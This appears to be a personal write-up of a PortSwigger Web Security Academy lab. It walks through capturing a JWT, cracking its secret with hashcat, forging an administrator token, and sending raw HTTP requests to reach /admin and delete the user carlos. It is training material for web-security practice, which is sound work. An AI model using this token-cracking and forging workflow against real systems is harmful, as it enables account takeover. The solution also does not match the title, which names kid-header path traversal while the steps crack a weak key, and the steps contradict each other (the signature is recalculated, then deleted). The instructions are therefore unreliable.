JWT authentication bypass via kid header path traversal - %

https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-kid-header-path-traversal

Description

Solution

Go to login page and access as wiener user.

JWT extension reveal that there's a JWT token, obviously related to wiener user account

{"iss":"portswigger","exp":1742682771,"sub":"wiener"}

Save the item into a file called 'jwt' to prepare input for our brute force attack.

eyJraWQiOiI3NTUzZjE1OC0zOTA5LTRiNDAtOGZhMy0zNDZmM2ZiZTViOTYiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTc0MjY4Mjc3MSwic3ViIjoid2llbmVyIn0.1h8m2wyXUGHZfKhTiOEKAvdKBhkgK5cDAGajwa2zrTo

hashcat -a 0 -m 16500 jwt ~/Documents/wordlists/jwt.secrets.list

Well done, 'secret1' is the result.

Using JSON Web Tokens tab, modify the sub field inserting: "administrator", select "recalculate Signature" and insert there: "secret1"

after that, go again into Pretty tab and change the id value to 'administrator': GET /my-account?id=administrator HTTP/2 and delete the signature of the cookie session (the last part):

GET /admin HTTP/2
Host: 0a71008804ff6c6185fbc1cf004b005c.web-security-academy.net
Cookie: session=eyJraWQiOiI4MmRmZWY5OC02YWE0LTRkNTItODNkOS03NTMwNzI5NmNhYTkiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsImV4cCI6MTc0MjY4NDUwOSwic3ViIjoiYWRtaW5pc3RyYXRvciJ9.t5w7XuZemQGQB2xo1NoxuYYgUGWU_Tro27qR-RT4oQU

click first on the Send button and then on Following redirection button

Now, we're authenticated as administrator!

Checking the response the admin panel's path is: /admin

analyzing the response, we see that the request to delete the user Carlos is the following: GET /admin/delete?username=carlos HTTP/2

So, Send and click to Following redirection to delete it and complete the lab.